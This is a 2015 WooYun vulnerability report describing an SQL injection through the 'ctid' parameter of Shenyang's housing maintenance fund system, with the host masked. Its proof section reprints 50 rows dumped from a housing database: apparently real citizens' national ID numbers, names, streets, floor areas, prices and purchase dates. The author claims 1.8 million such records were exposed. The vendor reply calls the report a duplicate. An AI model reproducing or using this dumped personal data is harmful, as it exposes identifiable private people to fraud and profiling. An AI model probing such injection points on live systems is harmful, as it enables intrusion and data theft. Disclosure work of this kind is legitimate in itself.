当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144128

漏洞标题:沈阳住房公积金系统存在SQL注入漏洞可影响到敏感数据

相关厂商:沈阳住房公积金

漏洞作者: 深度安全实验室

提交时间:2015-09-30 10:34

修复时间:2015-11-24 16:34

公开时间:2015-11-24 16:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-30: 细节已通知厂商并且等待厂商处理中
2015-10-10: 厂商已经确认,细节仅向厂商公开
2015-10-20: 细节向核心白帽子及相关领域专家公开
2015-10-30: 细节向普通白帽子公开
2015-11-09: 细节向实习白帽子公开
2015-11-24: 细节向公众公开

简要描述:

你家房子有多少、位置在哪里、面积有多大、房子值多少钱,我都知道。对于这些土豪,我赵日天表示不服!

详细说明:

沈阳市住宅专项维修资金管理系统 如下链接存在sql注入,其中,ctid参数有问题

http://**.**.**.**/viewNews.do?ctid=5&id=381

1.png


涉及22个库

3.png

漏洞证明:

以HOUSEUSER库、T_HOUSE表为例,180多万购房合同编号、购房人、房屋大小、房屋总价、购房时间等敏感信息泄露

1.png

Database: HOUSEUSER
Table: T_HOUSE
[50 entries]
+--------------------+--------+-----------+-----------+--------------+--------------+
| IDCARD             | STREET | OWNERNAME | HOUSEAREA | TOTALPRICE   | BUYHOUSEDATE |
+--------------------+--------+-----------+-----------+--------------+--------------+
| 210102196712240614 | 砂川街    | 刘学文       | 75.03     | 126050.4000  | 08-9月 -02    |
| 210114570721242    | 南京南街   | 马淑寅       | 183.851   | 422857.3000  | 22-9月 -02    |
| 210105651002371    | 中兴街    | 王军        | 133.04    | 305992.0000  | 20-9月 -02    |
| 210104500612071    | 民族南街   | 李尚明       | 113.41    | 260843.0000  | 18-5月 -02    |
| 210604550329208    | 文安路    | 姜心        | 154.5     | 494400.0000  | 20-9月 -02    |
| 210102620202151    | 十三纬路   | 郑毅        | 178.2     | 409860.0000  | 20-9月 -02    |
| 210102720129631    | 河北街    | 李枫        | 110.89    | 298294.0000  | 04-6月 -01    |
| 210103630105335    | 河北街    | 李晓冬       | 23.058    | 87620.0000   | 28-5月 -01    |
| 219007750626001    | 河北街    | 杨柳        | 114.049   | 282983.0000  | 15-5月 -01    |
| 210302721212063    | 河北街    | 罗钢        | 110.89    | 298405.0000  | 19-9月 -01    |
| 210102641014604    | 河北街    | 李清照       | 154.696   | 373127.0000  | 19-9月 -01    |
| 210102580107501    | 河北街    | 马世英       | 154.696   | 416132.0000  | 30-7月 -01    |
| 210102580107501    | 河北街    | 郭丹平       | 103.924   | 266086.0000  | 08-6月 -01    |
| 210102651106691    | 河北街    | 高寒微       | 114.049   | 319337.0000  | 04-7月 -01    |
| 210102570811101    | 河北街    | 陈德才       | 103.924   | 287869.0000  | 26-5月 -01    |
| 210102660308651    | 河北街    | 张诚斌       | 103.924   | 286103.0000  | 18-10月-01    |
| 210111690331002    | 河北街    | 高德琴       | 138.371   | 386055.0000  | 10-6月 -01    |
| 210323660117023    | 河北街    | 黄爱华       | 131.455   | 260281.0000  | 17-5月 -01    |
| 210102451004531    | 河北街    | 刘树林       | 104.149   | 228086.0000  | 09-6月 -01    |
| 210114196804065329 | 河北街    | 王立春       | 101.258   | 222768.0000  | 29-7月 -01    |
| 210102197105154129 | 南八马路   | 田家芳       | 64.01     | 147223.0000  | 20-9月 -02    |
| 210102690119474    | 河北街    | 郝凯雯       | 28.399    | 65317.7000   | 16-9月 -02    |
| 222324500110371    | 河北街    | 李永财       | 93.04     | 213992.0000  | 20-9月 -02    |
| 210105690814281    | 砂川街    | 张英辉       | 97.41     | 224043.0000  | 04-9月 -02    |
| 210106811008303    | 河北街    | 提威        | 85.4      | 189024.0000  | 20-9月 -02    |
| 21010319721009366X | 南三经街   | 尹崧琳       | 204.83    | 900000.0000  | 21-9月 -02    |
| 210102520622411    | 砂川街    | 徐秀德       | 97.41     | 224043.0000  | 21-9月 -02    |
| 210102500723301    | 南京南街   | 袁为人       | 137.958   | 427000.0000  | 20-9月 -02    |
| 210102560531223    | 砂川街    | 于业治       | 97.41     | 224043.0000  | 08-9月 -02    |
| 210102196110155025 | 同泽南街   | 祁丽英       | 168.325   | 387147.5000  | 23-9月 -02    |
| 210102620521531    | 振兴街    | 刘廷洲       | 193.63    | 800853.0000  | 09-7月 -01    |
| 210102450826304    | 振兴街    | 王文君       | 226.9947  | 1260000.0000 | 16-7月 -01    |
| 210103681202032    | 振兴街    | 耿柳        | 176.05    | 718000.0000  | 10-7月 -01    |
| 210114561024301    | 振兴街    | 杨绪清       | 24.41     | 112286.0000  | 15-8月 -01    |
| 640103197212180011 | 振兴街    | 王涛        | 190.51    | 820000.0000  | 12-9月 -01    |
| 210114570809003    | 振兴街    | 侯忠利       | 34.85     | 156825.0000  | 26-12月-00    |
| 210103810219061    | 南五马路   | 刘宁        | 288.23    | 1239389.0000 | 16-9月 -01    |
| 210102196802185313 | 南五马路   | 蒋斌        | 172.3423  | 750000.0000  | 10-7月 -01    |
| 210103810219061    | 南五马路   | 刘宁        | 166.4931  | 567758.0000  | 16-9月 -01    |
| 210102730530413    | 南五马路   | 苏立辉       | 169.4389  | 722989.0000  | 01-8月 -01    |
| 210102571029441    | 西安街    | 刘杰        | 28.93     | 68000.0000   | 12-7月 -01    |
| 210102560415441    | 西安街    | 唐树屏       | 23.13     | 504423.4000  | 18-9月 -01    |
| 210106530720242    | 昆明南街   | 刘达文       | 147.13    | 481645.0000  | 14-8月 -01    |
| 210106530720242    | 昆明南街   | 刘达文       | 26.08     | 90000.0000   | 14-8月 -01    |
| 210102550508155    | 昆明南街   | 刘义        | 127.68    | 351758.0000  | 19-9月 -01    |
| 210106721223153    | 昆明南街   | 侯景彪       | 124.5     | 295700.0000  | 19-9月 -01    |
| 210102194503183714 | 昆明南街   | 祝玉华       | 10.48     | 8384.0000    | 13-8月 -01    |
| 210102195102073711 | 昆明南街   | 李德福       | 10        | 8000.0000    | 19-9月 -01    |
| 2100001016824      | 和平南大街  | 辽海出版社     | 26.134    | 150000.0000  | 01-6月 -01    |
| 2100001016824      | 和平南大街  | 辽海出版社     | 21.478    | 124572.0000  | 01-6月 -01    |
+--------------------+--------+-----------+-----------+--------------+--------------+

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-10-10 16:33

厂商回复:

重复漏洞,CNVD不再重复处置

最新状态:

暂无